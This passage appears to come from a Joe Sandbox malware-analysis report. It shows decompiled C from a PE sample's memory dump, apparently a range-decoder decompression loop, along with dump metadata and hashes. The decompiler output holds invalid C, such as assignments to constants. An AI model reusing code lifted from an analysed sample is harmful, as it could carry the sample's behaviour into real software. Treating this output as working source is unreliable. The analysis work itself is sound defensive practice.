                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												L35:
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												L32:
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											L66:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												L68:
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											L67:
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											goto L132;
                										case 8:
                											L70:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xa;
                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                											} else {
                												__eax =  *(__ebp - 0x38);
                												__ecx =  *(__ebp - 4);
                												__eax =  *(__ebp - 0x38) + 0xf;
                												 *(__ebp - 0x84) = 9;
                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                											}
                											goto L132;
                										case 9:
                											L73:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L90;
                											}
                											L74:
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											L75:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t259;
                											0 | _t259 = _t259 + _t259 + 9;
                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                											goto L76;
                										case 0xa:
                											L82:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L84:
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											L83:
                											__eax =  *(__ebp - 0x28);
                											goto L89;
                										case 0xb:
                											L85:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L89:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L90:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L99:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L164:
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											L100:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t334 = __ebp - 0x70;
                											 *_t334 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t334;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L101;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L159:
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											L38:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											L40:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												L45:
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L160:
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											L47:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												L49:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													L53:
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L161:
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											L59:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												L65:
                												goto L58;
                											}
                										case 0x10:
                											L109:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												L165:
                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											L110:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t365 = __ebp - 0x70;
                											 *_t365 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t365;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L111;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											goto L132;
                										case 0x12:
                											L128:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L131:
                												__eax =  *(__ebp - 0x58);
                												 *(__ebp - 0x84) = 0x13;
                												__esi =  *(__ebp - 0x58) + 2;
                												L132:
                												 *(_t644 - 0x54) = _t642;
                												goto L133;
                											}
                											L129:
                											__eax =  *(__ebp - 0x4c);
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											__eflags = __eax;
                											__eax =  *(__ebp - 0x58) + __eax + 4;
                											goto L130;
                										case 0x13:
                											L141:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L143:
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												L144:
                												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                												L145:
                												 *(_t644 - 0x50) = 1;
                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                												goto L149;
                											}
                											L142:
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											L130:
                											 *(__ebp - 0x58) = __eax;
                											 *(__ebp - 0x40) = 3;
                											goto L144;
                										case 0x14:
                											L156:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											while(1) {
                												L140:
                												 *(_t644 - 0x88) = _t537;
                												goto L1;
                											}
                										case 0x15:
                											L91:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L120;
                										case 0x16:
                											goto L0;
                										case 0x17:
                											while(1) {
                												L145:
                												 *(_t644 - 0x50) = 1;
                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                												goto L149;
                											}
                										case 0x18:
                											goto L146;
                										case 0x19:
                											L94:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												L98:
                												 *(__ebp - 0x2c) = __ebx;
                												L119:
                												_t393 = __ebp - 0x2c;
                												 *_t393 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t393;
                												L120:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													L166:
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												L121:
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												L122:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t400 = __ebp - 0x60;
                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t400;
                												goto L123;
                											}
                											L95:
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												L97:
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L102:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													L107:
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L108:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L112:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														L118:
                														_t391 = __ebp - 0x2c;
                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t391;
                														goto L119;
                													}
                													L113:
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L111:
                														_t368 = __ebp - 0x48;
                														 *_t368 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t368;
                														goto L112;
                													} else {
                														L117:
                														goto L109;
                													}
                												}
                												L103:
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L101:
                													_t338 = __ebp - 0x48;
                													 *_t338 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t338;
                													goto L102;
                												} else {
                													L106:
                													goto L99;
                												}
                											}
                											L96:
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L108;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												L162:
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											L57:
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L80;
                										case 0x1b:
                											L76:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												L163:
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											L77:
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t275 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t275;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t284 = __ebp - 0x64;
                											 *_t284 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t284;
                											 *( *(__ebp - 0x68)) = __cl;
                											L80:
                											 *(__ebp - 0x14) = __edx;
                											goto L81;
                										case 0x1c:
                											while(1) {
                												L123:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												L124:
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t414 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t414;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t414;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L127:
                													L81:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											L167:
                											 *(__ebp - 0x88) = 0x1c;
                											goto L170;
                									}
                								}
                								L171:
                								_t539 = _t538 | 0xffffffff;
                								goto L172;
                							}
                						}
                					}
                				}
                			}
















                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                • Instruction ID: fb01dad5a0cc1219e3999a8d2bb186b1e56f72b4220c9c95c749fe4814af579a
                • Opcode Fuzzy Hash: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                • Instruction Fuzzy Hash: 0CA15471D00229CBDF28CFA8C8447ADBBB1FB44305F15816AD856BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E004066B9() {
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int* _t605;
                				void* _t612;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t612 - 0x40) != 0) {
                						 *(_t612 - 0x84) = 0x13;
                						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                						goto L132;
                					} else {
                						__eax =  *(__ebp - 0x4c);
                						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                						__ecx =  *(__ebp - 0x58);
                						__eax =  *(__ebp - 0x4c) << 4;
                						__eax =  *(__ebp - 0x58) + __eax + 4;
                						L130:
                						 *(__ebp - 0x58) = __eax;
                						 *(__ebp - 0x40) = 3;
                						L144:
                						 *(__ebp - 0x7c) = 0x14;
                						L145:
                						__eax =  *(__ebp - 0x40);
                						 *(__ebp - 0x50) = 1;
                						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                						L149:
                						if( *(__ebp - 0x48) <= 0) {
                							__ecx =  *(__ebp - 0x40);
                							__ebx =  *(__ebp - 0x50);
                							0 = 1;
                							__eax = 1 << __cl;
                							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                							__eax =  *(__ebp - 0x7c);
                							 *(__ebp - 0x44) = __ebx;
                							while(1) {
                								L140:
                								 *(_t612 - 0x88) = _t533;
                								while(1) {
                									L1:
